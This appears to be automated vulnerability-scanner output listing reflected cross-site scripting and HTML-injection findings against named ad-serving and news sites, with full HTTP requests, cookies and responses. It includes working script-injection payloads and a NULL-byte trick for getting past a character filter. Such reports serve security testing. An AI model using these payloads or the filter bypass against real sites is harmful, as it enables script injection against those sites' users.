GET /control?description=Good%20news%20for%20those%20who%20feel%20stuffy%20saying%20'whom.'&zid=mwvideo_autosilent&url=http%3A%2F%2Fvideo.merriam-webster.com%2F0024-whowhom.mp4%3Fec_rate%3D72&duration=111000&height=240&key=mwgames&pageUrl=http%3A%2F%2Fwww.merriam-webster.com%2Fdictionary%2Fxss&width=320&keywords=test%2Cvideo%2Cadaptv&id=0024-whowhom&isTop=true&title=Who%20vs.%20Whom&categories=category1%2Ccategory2&sessionId=cvcrvf&companionId=main_adbfcf8<a>990b97b465b&as=3&eov=fw5il5 HTTP/1.1 Host: control.adap.tv Proxy-Connection: keep-alive Referer: http://www.merriam-webster.com/swf/player.swf Accept: */* User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.13 (KHTML, like Gecko) Chrome/9.0.597.107 Safari/534.13 Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3 Cookie: adaptv_unique_user_cookie="5951245120132160017__TIME__2011-03-05+18%3A07%3A41"; audienceData="{\"v\":2,\"providers\":{\"10\":{\"f\":1301295600,\"e\":1301295600,\"s\":[],\"a\":[]},\"9\":{\"f\":1301900400,\"e\":1301900400,\"s\":[529,528],\"a\":[]}}}"
The value of the description request parameter is copied into the HTML document as plain text between tags. The payload 4bc0b<a>d55f2fa87d4 was submitted in the description parameter. This input was echoed unmodified in the application's response.
This behaviour demonstrates that it is possible to inject new HTML tags into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.
Request
GET /control?description=Good%20news%20for%20those%20who%20feel%20stuffy%20saying%20'whom.'4bc0b<a>d55f2fa87d4&zid=mwvideo_autosilent&url=http%3A%2F%2Fvideo.merriam-webster.com%2F0024-whowhom.mp4%3Fec_rate%3D72&duration=111000&height=240&key=mwgames&pageUrl=http%3A%2F%2Fwww.merriam-webster.com%2Fdictionary%2Fxss&width=320&keywords=test%2Cvideo%2Cadaptv&id=0024-whowhom&isTop=true&title=Who%20vs.%20Whom&categories=category1%2Ccategory2&sessionId=cvcrvf&companionId=main_ad&as=3&eov=fw5il5 HTTP/1.1 Host: control.adap.tv Proxy-Connection: keep-alive Referer: http://www.merriam-webster.com/swf/player.swf Accept: */* User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.13 (KHTML, like Gecko) Chrome/9.0.597.107 Safari/534.13 Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3 Cookie: adaptv_unique_user_cookie="5951245120132160017__TIME__2011-03-05+18%3A07%3A41"; audienceData="{\"v\":2,\"providers\":{\"10\":{\"f\":1301295600,\"e\":1301295600,\"s\":[],\"a\":[]},\"9\":{\"f\":1301900400,\"e\":1301900400,\"s\":[529,528],\"a\":[]}}}"
The value of the duration request parameter is copied into the HTML document as plain text between tags. The payload 9d05d<a>d0418fc140c was submitted in the duration parameter. This input was echoed unmodified in the application's response.
This behaviour demonstrates that it is possible to inject new HTML tags into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.
Request
GET /control?description=Good%20news%20for%20those%20who%20feel%20stuffy%20saying%20'whom.'&zid=mwvideo_autosilent&url=http%3A%2F%2Fvideo.merriam-webster.com%2F0024-whowhom.mp4%3Fec_rate%3D72&duration=1110009d05d<a>d0418fc140c&height=240&key=mwgames&pageUrl=http%3A%2F%2Fwww.merriam-webster.com%2Fdictionary%2Fxss&width=320&keywords=test%2Cvideo%2Cadaptv&id=0024-whowhom&isTop=true&title=Who%20vs.%20Whom&categories=category1%2Ccategory2&sessionId=cvcrvf&companionId=main_ad&as=3&eov=fw5il5 HTTP/1.1 Host: control.adap.tv Proxy-Connection: keep-alive Referer: http://www.merriam-webster.com/swf/player.swf Accept: */* User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.13 (KHTML, like Gecko) Chrome/9.0.597.107 Safari/534.13 Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3 Cookie: adaptv_unique_user_cookie="5951245120132160017__TIME__2011-03-05+18%3A07%3A41"; audienceData="{\"v\":2,\"providers\":{\"10\":{\"f\":1301295600,\"e\":1301295600,\"s\":[],\"a\":[]},\"9\":{\"f\":1301900400,\"e\":1301900400,\"s\":[529,528],\"a\":[]}}}"
The value of the eov request parameter is copied into the HTML document as plain text between tags. The payload d55ca<a>e622e206ef9 was submitted in the eov parameter. This input was echoed unmodified in the application's response.
This behaviour demonstrates that it is possible to inject new HTML tags into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.
Request
GET /control?description=Good%20news%20for%20those%20who%20feel%20stuffy%20saying%20'whom.'&zid=mwvideo_autosilent&url=http%3A%2F%2Fvideo.merriam-webster.com%2F0024-whowhom.mp4%3Fec_rate%3D72&duration=111000&height=240&key=mwgames&pageUrl=http%3A%2F%2Fwww.merriam-webster.com%2Fdictionary%2Fxss&width=320&keywords=test%2Cvideo%2Cadaptv&id=0024-whowhom&isTop=true&title=Who%20vs.%20Whom&categories=category1%2Ccategory2&sessionId=cvcrvf&companionId=main_ad&as=3&eov=fw5il5d55ca<a>e622e206ef9 HTTP/1.1 Host: control.adap.tv Proxy-Connection: keep-alive Referer: http://www.merriam-webster.com/swf/player.swf Accept: */* User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.13 (KHTML, like Gecko) Chrome/9.0.597.107 Safari/534.13 Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3 Cookie: adaptv_unique_user_cookie="5951245120132160017__TIME__2011-03-05+18%3A07%3A41"; audienceData="{\"v\":2,\"providers\":{\"10\":{\"f\":1301295600,\"e\":1301295600,\"s\":[],\"a\":[]},\"9\":{\"f\":1301900400,\"e\":1301900400,\"s\":[529,528],\"a\":[]}}}"
The value of the height request parameter is copied into the HTML document as plain text between tags. The payload 6eead<a>c1e6e1a085e was submitted in the height parameter. This input was echoed unmodified in the application's response.
This behaviour demonstrates that it is possible to inject new HTML tags into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.
Request
GET /control?description=Good%20news%20for%20those%20who%20feel%20stuffy%20saying%20'whom.'&zid=mwvideo_autosilent&url=http%3A%2F%2Fvideo.merriam-webster.com%2F0024-whowhom.mp4%3Fec_rate%3D72&duration=111000&height=2406eead<a>c1e6e1a085e&key=mwgames&pageUrl=http%3A%2F%2Fwww.merriam-webster.com%2Fdictionary%2Fxss&width=320&keywords=test%2Cvideo%2Cadaptv&id=0024-whowhom&isTop=true&title=Who%20vs.%20Whom&categories=category1%2Ccategory2&sessionId=cvcrvf&companionId=main_ad&as=3&eov=fw5il5 HTTP/1.1 Host: control.adap.tv Proxy-Connection: keep-alive Referer: http://www.merriam-webster.com/swf/player.swf Accept: */* User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.13 (KHTML, like Gecko) Chrome/9.0.597.107 Safari/534.13 Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3 Cookie: adaptv_unique_user_cookie="5951245120132160017__TIME__2011-03-05+18%3A07%3A41"; audienceData="{\"v\":2,\"providers\":{\"10\":{\"f\":1301295600,\"e\":1301295600,\"s\":[],\"a\":[]},\"9\":{\"f\":1301900400,\"e\":1301900400,\"s\":[529,528],\"a\":[]}}}"
The value of the id request parameter is copied into the HTML document as plain text between tags. The payload ca11a<a>6a67868646c was submitted in the id parameter. This input was echoed unmodified in the application's response.
This behaviour demonstrates that it is possible to inject new HTML tags into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.
Request
GET /control?description=Good%20news%20for%20those%20who%20feel%20stuffy%20saying%20'whom.'&zid=mwvideo_autosilent&url=http%3A%2F%2Fvideo.merriam-webster.com%2F0024-whowhom.mp4%3Fec_rate%3D72&duration=111000&height=240&key=mwgames&pageUrl=http%3A%2F%2Fwww.merriam-webster.com%2Fdictionary%2Fxss&width=320&keywords=test%2Cvideo%2Cadaptv&id=0024-whowhomca11a<a>6a67868646c&isTop=true&title=Who%20vs.%20Whom&categories=category1%2Ccategory2&sessionId=cvcrvf&companionId=main_ad&as=3&eov=fw5il5 HTTP/1.1 Host: control.adap.tv Proxy-Connection: keep-alive Referer: http://www.merriam-webster.com/swf/player.swf Accept: */* User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.13 (KHTML, like Gecko) Chrome/9.0.597.107 Safari/534.13 Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3 Cookie: adaptv_unique_user_cookie="5951245120132160017__TIME__2011-03-05+18%3A07%3A41"; audienceData="{\"v\":2,\"providers\":{\"10\":{\"f\":1301295600,\"e\":1301295600,\"s\":[],\"a\":[]},\"9\":{\"f\":1301900400,\"e\":1301900400,\"s\":[529,528],\"a\":[]}}}"
The value of the isTop request parameter is copied into the HTML document as plain text between tags. The payload 8b341<a>9d6b8a426a3 was submitted in the isTop parameter. This input was echoed unmodified in the application's response.
This behaviour demonstrates that it is possible to inject new HTML tags into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.
Request
GET /control?description=Good%20news%20for%20those%20who%20feel%20stuffy%20saying%20'whom.'&zid=mwvideo_autosilent&url=http%3A%2F%2Fvideo.merriam-webster.com%2F0024-whowhom.mp4%3Fec_rate%3D72&duration=111000&height=240&key=mwgames&pageUrl=http%3A%2F%2Fwww.merriam-webster.com%2Fdictionary%2Fxss&width=320&keywords=test%2Cvideo%2Cadaptv&id=0024-whowhom&isTop=true8b341<a>9d6b8a426a3&title=Who%20vs.%20Whom&categories=category1%2Ccategory2&sessionId=cvcrvf&companionId=main_ad&as=3&eov=fw5il5 HTTP/1.1 Host: control.adap.tv Proxy-Connection: keep-alive Referer: http://www.merriam-webster.com/swf/player.swf Accept: */* User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.13 (KHTML, like Gecko) Chrome/9.0.597.107 Safari/534.13 Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3 Cookie: adaptv_unique_user_cookie="5951245120132160017__TIME__2011-03-05+18%3A07%3A41"; audienceData="{\"v\":2,\"providers\":{\"10\":{\"f\":1301295600,\"e\":1301295600,\"s\":[],\"a\":[]},\"9\":{\"f\":1301900400,\"e\":1301900400,\"s\":[529,528],\"a\":[]}}}"
The value of the keywords request parameter is copied into the HTML document as plain text between tags. The payload f0eed<a>c6c1a053c81 was submitted in the keywords parameter. This input was echoed unmodified in the application's response.
This behaviour demonstrates that it is possible to inject new HTML tags into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.
Request
GET /control?description=Good%20news%20for%20those%20who%20feel%20stuffy%20saying%20'whom.'&zid=mwvideo_autosilent&url=http%3A%2F%2Fvideo.merriam-webster.com%2F0024-whowhom.mp4%3Fec_rate%3D72&duration=111000&height=240&key=mwgames&pageUrl=http%3A%2F%2Fwww.merriam-webster.com%2Fdictionary%2Fxss&width=320&keywords=test%2Cvideo%2Cadaptvf0eed<a>c6c1a053c81&id=0024-whowhom&isTop=true&title=Who%20vs.%20Whom&categories=category1%2Ccategory2&sessionId=cvcrvf&companionId=main_ad&as=3&eov=fw5il5 HTTP/1.1 Host: control.adap.tv Proxy-Connection: keep-alive Referer: http://www.merriam-webster.com/swf/player.swf Accept: */* User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.13 (KHTML, like Gecko) Chrome/9.0.597.107 Safari/534.13 Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3 Cookie: adaptv_unique_user_cookie="5951245120132160017__TIME__2011-03-05+18%3A07%3A41"; audienceData="{\"v\":2,\"providers\":{\"10\":{\"f\":1301295600,\"e\":1301295600,\"s\":[],\"a\":[]},\"9\":{\"f\":1301900400,\"e\":1301900400,\"s\":[529,528],\"a\":[]}}}"
1.106. http://control.adap.tv/control [name of an arbitrarily supplied request parameter]previousnext
Summary
Severity:
High
Confidence:
Firm
Host:
http://control.adap.tv
Path:
/control
Issue detail
The name of an arbitrarily supplied request parameter is copied into the HTML document as plain text between tags. The payload 8c976<a>f1ee9229782 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.
This behaviour demonstrates that it is possible to inject new HTML tags into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.
Request
GET /control?description=Good%20news%20for%20those%20who%20feel%20stuffy%20saying%20'whom.'&zid=mwvideo_autosilent&url=http%3A%2F%2Fvideo.merriam-webster.com%2F0024-whowhom.mp4%3Fec_rate%3D72&duration=111000&height=240&key=mwgames&pageUrl=http%3A%2F%2Fwww.merriam-webster.com%2Fdictionary%2Fxss&width=320&keywords=test%2Cvideo%2Cadaptv&id=0024-whowhom&isTop=true&title=Who%20vs.%20Whom&categories=category1%2Ccategory2&sessionId=cvcrvf&companionId=main_ad&as=3&eov=fw5il5&8c976<a>f1ee9229782=1 HTTP/1.1 Host: control.adap.tv Proxy-Connection: keep-alive Referer: http://www.merriam-webster.com/swf/player.swf Accept: */* User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.13 (KHTML, like Gecko) Chrome/9.0.597.107 Safari/534.13 Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3 Cookie: adaptv_unique_user_cookie="5951245120132160017__TIME__2011-03-05+18%3A07%3A41"; audienceData="{\"v\":2,\"providers\":{\"10\":{\"f\":1301295600,\"e\":1301295600,\"s\":[],\"a\":[]},\"9\":{\"f\":1301900400,\"e\":1301900400,\"s\":[529,528],\"a\":[]}}}"
The value of the pageUrl request parameter is copied into the HTML document as plain text between tags. The payload d673b<a>3e906cc1dac was submitted in the pageUrl parameter. This input was echoed unmodified in the application's response.
This behaviour demonstrates that it is possible to inject new HTML tags into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.
Request
GET /control?description=Good%20news%20for%20those%20who%20feel%20stuffy%20saying%20'whom.'&zid=mwvideo_autosilent&url=http%3A%2F%2Fvideo.merriam-webster.com%2F0024-whowhom.mp4%3Fec_rate%3D72&duration=111000&height=240&key=mwgames&pageUrl=http%3A%2F%2Fwww.merriam-webster.com%2Fdictionary%2Fxssd673b<a>3e906cc1dac&width=320&keywords=test%2Cvideo%2Cadaptv&id=0024-whowhom&isTop=true&title=Who%20vs.%20Whom&categories=category1%2Ccategory2&sessionId=cvcrvf&companionId=main_ad&as=3&eov=fw5il5 HTTP/1.1 Host: control.adap.tv Proxy-Connection: keep-alive Referer: http://www.merriam-webster.com/swf/player.swf Accept: */* User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.13 (KHTML, like Gecko) Chrome/9.0.597.107 Safari/534.13 Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3 Cookie: adaptv_unique_user_cookie="5951245120132160017__TIME__2011-03-05+18%3A07%3A41"; audienceData="{\"v\":2,\"providers\":{\"10\":{\"f\":1301295600,\"e\":1301295600,\"s\":[],\"a\":[]},\"9\":{\"f\":1301900400,\"e\":1301900400,\"s\":[529,528],\"a\":[]}}}"
The value of the sessionId request parameter is copied into the HTML document as plain text between tags. The payload 2f8c4<a>ac8a344f53e was submitted in the sessionId parameter. This input was echoed unmodified in the application's response.
This behaviour demonstrates that it is possible to inject new HTML tags into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.
Request
GET /control?description=Good%20news%20for%20those%20who%20feel%20stuffy%20saying%20'whom.'&zid=mwvideo_autosilent&url=http%3A%2F%2Fvideo.merriam-webster.com%2F0024-whowhom.mp4%3Fec_rate%3D72&duration=111000&height=240&key=mwgames&pageUrl=http%3A%2F%2Fwww.merriam-webster.com%2Fdictionary%2Fxss&width=320&keywords=test%2Cvideo%2Cadaptv&id=0024-whowhom&isTop=true&title=Who%20vs.%20Whom&categories=category1%2Ccategory2&sessionId=cvcrvf2f8c4<a>ac8a344f53e&companionId=main_ad&as=3&eov=fw5il5 HTTP/1.1 Host: control.adap.tv Proxy-Connection: keep-alive Referer: http://www.merriam-webster.com/swf/player.swf Accept: */* User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.13 (KHTML, like Gecko) Chrome/9.0.597.107 Safari/534.13 Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3 Cookie: adaptv_unique_user_cookie="5951245120132160017__TIME__2011-03-05+18%3A07%3A41"; audienceData="{\"v\":2,\"providers\":{\"10\":{\"f\":1301295600,\"e\":1301295600,\"s\":[],\"a\":[]},\"9\":{\"f\":1301900400,\"e\":1301900400,\"s\":[529,528],\"a\":[]}}}"
The value of the title request parameter is copied into the HTML document as plain text between tags. The payload 9174f<a>7150df027b was submitted in the title parameter. This input was echoed unmodified in the application's response.
This behaviour demonstrates that it is possible to inject new HTML tags into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.
Request
GET /control?description=Good%20news%20for%20those%20who%20feel%20stuffy%20saying%20'whom.'&zid=mwvideo_autosilent&url=http%3A%2F%2Fvideo.merriam-webster.com%2F0024-whowhom.mp4%3Fec_rate%3D72&duration=111000&height=240&key=mwgames&pageUrl=http%3A%2F%2Fwww.merriam-webster.com%2Fdictionary%2Fxss&width=320&keywords=test%2Cvideo%2Cadaptv&id=0024-whowhom&isTop=true&title=Who%20vs.%20Whom9174f<a>7150df027b&categories=category1%2Ccategory2&sessionId=cvcrvf&companionId=main_ad&as=3&eov=fw5il5 HTTP/1.1 Host: control.adap.tv Proxy-Connection: keep-alive Referer: http://www.merriam-webster.com/swf/player.swf Accept: */* User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.13 (KHTML, like Gecko) Chrome/9.0.597.107 Safari/534.13 Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3 Cookie: adaptv_unique_user_cookie="5951245120132160017__TIME__2011-03-05+18%3A07%3A41"; audienceData="{\"v\":2,\"providers\":{\"10\":{\"f\":1301295600,\"e\":1301295600,\"s\":[],\"a\":[]},\"9\":{\"f\":1301900400,\"e\":1301900400,\"s\":[529,528],\"a\":[]}}}"
The value of the url request parameter is copied into the HTML document as plain text between tags. The payload c9735<a>e3cf58f3e7c was submitted in the url parameter. This input was echoed unmodified in the application's response.
This behaviour demonstrates that it is possible to inject new HTML tags into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.
Request
GET /control?description=Good%20news%20for%20those%20who%20feel%20stuffy%20saying%20'whom.'&zid=mwvideo_autosilent&url=http%3A%2F%2Fvideo.merriam-webster.com%2F0024-whowhom.mp4%3Fec_rate%3D72c9735<a>e3cf58f3e7c&duration=111000&height=240&key=mwgames&pageUrl=http%3A%2F%2Fwww.merriam-webster.com%2Fdictionary%2Fxss&width=320&keywords=test%2Cvideo%2Cadaptv&id=0024-whowhom&isTop=true&title=Who%20vs.%20Whom&categories=category1%2Ccategory2&sessionId=cvcrvf&companionId=main_ad&as=3&eov=fw5il5 HTTP/1.1 Host: control.adap.tv Proxy-Connection: keep-alive Referer: http://www.merriam-webster.com/swf/player.swf Accept: */* User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.13 (KHTML, like Gecko) Chrome/9.0.597.107 Safari/534.13 Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3 Cookie: adaptv_unique_user_cookie="5951245120132160017__TIME__2011-03-05+18%3A07%3A41"; audienceData="{\"v\":2,\"providers\":{\"10\":{\"f\":1301295600,\"e\":1301295600,\"s\":[],\"a\":[]},\"9\":{\"f\":1301900400,\"e\":1301900400,\"s\":[529,528],\"a\":[]}}}"
The value of the width request parameter is copied into the HTML document as plain text between tags. The payload 2876f<a>6470f90d1d8 was submitted in the width parameter. This input was echoed unmodified in the application's response.
This behaviour demonstrates that it is possible to inject new HTML tags into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.
Request
GET /control?description=Good%20news%20for%20those%20who%20feel%20stuffy%20saying%20'whom.'&zid=mwvideo_autosilent&url=http%3A%2F%2Fvideo.merriam-webster.com%2F0024-whowhom.mp4%3Fec_rate%3D72&duration=111000&height=240&key=mwgames&pageUrl=http%3A%2F%2Fwww.merriam-webster.com%2Fdictionary%2Fxss&width=3202876f<a>6470f90d1d8&keywords=test%2Cvideo%2Cadaptv&id=0024-whowhom&isTop=true&title=Who%20vs.%20Whom&categories=category1%2Ccategory2&sessionId=cvcrvf&companionId=main_ad&as=3&eov=fw5il5 HTTP/1.1 Host: control.adap.tv Proxy-Connection: keep-alive Referer: http://www.merriam-webster.com/swf/player.swf Accept: */* User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.13 (KHTML, like Gecko) Chrome/9.0.597.107 Safari/534.13 Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3 Cookie: adaptv_unique_user_cookie="5951245120132160017__TIME__2011-03-05+18%3A07%3A41"; audienceData="{\"v\":2,\"providers\":{\"10\":{\"f\":1301295600,\"e\":1301295600,\"s\":[],\"a\":[]},\"9\":{\"f\":1301900400,\"e\":1301900400,\"s\":[529,528],\"a\":[]}}}"
The value of the zid request parameter is copied into the HTML document as plain text between tags. The payload 8c414<a>3c1703c2f45 was submitted in the zid parameter. This input was echoed unmodified in the application's response.
This behaviour demonstrates that it is possible to inject new HTML tags into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.
Request
GET /control?description=Good%20news%20for%20those%20who%20feel%20stuffy%20saying%20'whom.'&zid=mwvideo_autosilent8c414<a>3c1703c2f45&url=http%3A%2F%2Fvideo.merriam-webster.com%2F0024-whowhom.mp4%3Fec_rate%3D72&duration=111000&height=240&key=mwgames&pageUrl=http%3A%2F%2Fwww.merriam-webster.com%2Fdictionary%2Fxss&width=320&keywords=test%2Cvideo%2Cadaptv&id=0024-whowhom&isTop=true&title=Who%20vs.%20Whom&categories=category1%2Ccategory2&sessionId=cvcrvf&companionId=main_ad&as=3&eov=fw5il5 HTTP/1.1 Host: control.adap.tv Proxy-Connection: keep-alive Referer: http://www.merriam-webster.com/swf/player.swf Accept: */* User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.13 (KHTML, like Gecko) Chrome/9.0.597.107 Safari/534.13 Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3 Cookie: adaptv_unique_user_cookie="5951245120132160017__TIME__2011-03-05+18%3A07%3A41"; audienceData="{\"v\":2,\"providers\":{\"10\":{\"f\":1301295600,\"e\":1301295600,\"s\":[],\"a\":[]},\"9\":{\"f\":1301900400,\"e\":1301900400,\"s\":[529,528],\"a\":[]}}}"
The value of the sz request parameter is copied into the HTML document as plain text between tags. The payload ac8d0<script>alert(1)</script>93bad1c92ea was submitted in the sz parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
HTTP/1.1 200 OK Server: Apache-Coyote/1.1 P3P: policyref="http://www.fimserve.com/p3p.xml",CP="CAO DSP COR CURa ADMa DEVa TAIa PSAa PSDa IVAa IVDa OUR DELa SAMa UNRa OTRa IND UNI PUR NAV INT DEM CNT PRE" Cache-Control: no-cache Pragma: no-cache Expires: Thu, 01 Jan 1970 00:00:00 GMT Content-Type: text/html;charset=ISO-8859-1 Content-Length: 151 Date: Mon, 07 Mar 2011 01:50:03 GMT
The value of REST URL parameter 1 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload %00ab6a7"><script>alert(1)</script>c8b7f49b411 was submitted in the REST URL parameter 1. This input was echoed as ab6a7"><script>alert(1)</script>c8b7f49b411 in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
The application attempts to block certain characters that are often used in XSS attacks but this can be circumvented by submitting a URL-encoded NULL byte (%00) anywhere before the characters that are being blocked.
Request
GET /submit%00ab6a7"><script>alert(1)</script>c8b7f49b411 HTTP/1.1 Host: digg.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close
The value of REST URL parameter 2 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 46b1d"><script>alert(1)</script>f717e003dda was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /2/B3DM46b1d"><script>alert(1)</script>f717e003dda/2010DM/1379918009@x23 HTTP/1.1 Host: dm.de.mookie1.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: id=3375925924; RMFM=011PvfB8Q10CWN|U10Dil|E10Dzy; RMFL=011Pu357U107OI; session=1299459588|1299459588; dlx_XXX=set; NXCLICK2=011Pu357NX_TRACK_Radioshack/Magnetic/DYN2011Q1/M_COM/1x1/1[timestamp]!y!B3!CWN!EUV; other_20110126=set; NSC_en.ef.efm_qppm_iuuq=ffffffff09499e2045525d5f4f58455e445a4a423660; OAX=rcHW801b0RcADNFE;
Response
HTTP/1.1 200 OK Date: Tue, 08 Mar 2011 12:02:48 GMT Server: Apache/2.2.3 (Red Hat) P3P: CP="NON NID PSAa PSDa OUR IND UNI COM NAV STA",policyref="/w3c/p3p.xml" Content-Length: 333 Keep-Alive: timeout=60 Connection: Keep-Alive Content-Type: text/html
The value of REST URL parameter 3 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload e5de6"><script>alert(1)</script>3370aaa4e8c was submitted in the REST URL parameter 3. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /2/B3DM/2010DMe5de6"><script>alert(1)</script>3370aaa4e8c/1379918009@x23 HTTP/1.1 Host: dm.de.mookie1.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: id=3375925924; RMFM=011PvfB8Q10CWN|U10Dil|E10Dzy; RMFL=011Pu357U107OI; session=1299459588|1299459588; dlx_XXX=set; NXCLICK2=011Pu357NX_TRACK_Radioshack/Magnetic/DYN2011Q1/M_COM/1x1/1[timestamp]!y!B3!CWN!EUV; other_20110126=set; NSC_en.ef.efm_qppm_iuuq=ffffffff09499e2045525d5f4f58455e445a4a423660; OAX=rcHW801b0RcADNFE;
Response
HTTP/1.1 200 OK Date: Tue, 08 Mar 2011 12:02:48 GMT Server: Apache/2.2.3 (Red Hat) P3P: CP="NON NID PSAa PSDa OUR IND UNI COM NAV STA",policyref="/w3c/p3p.xml" Content-Length: 333 Keep-Alive: timeout=60 Connection: Keep-Alive Content-Type: text/html
The value of REST URL parameter 4 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 97f9f"><script>alert(1)</script>40b55b3338d was submitted in the REST URL parameter 4. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
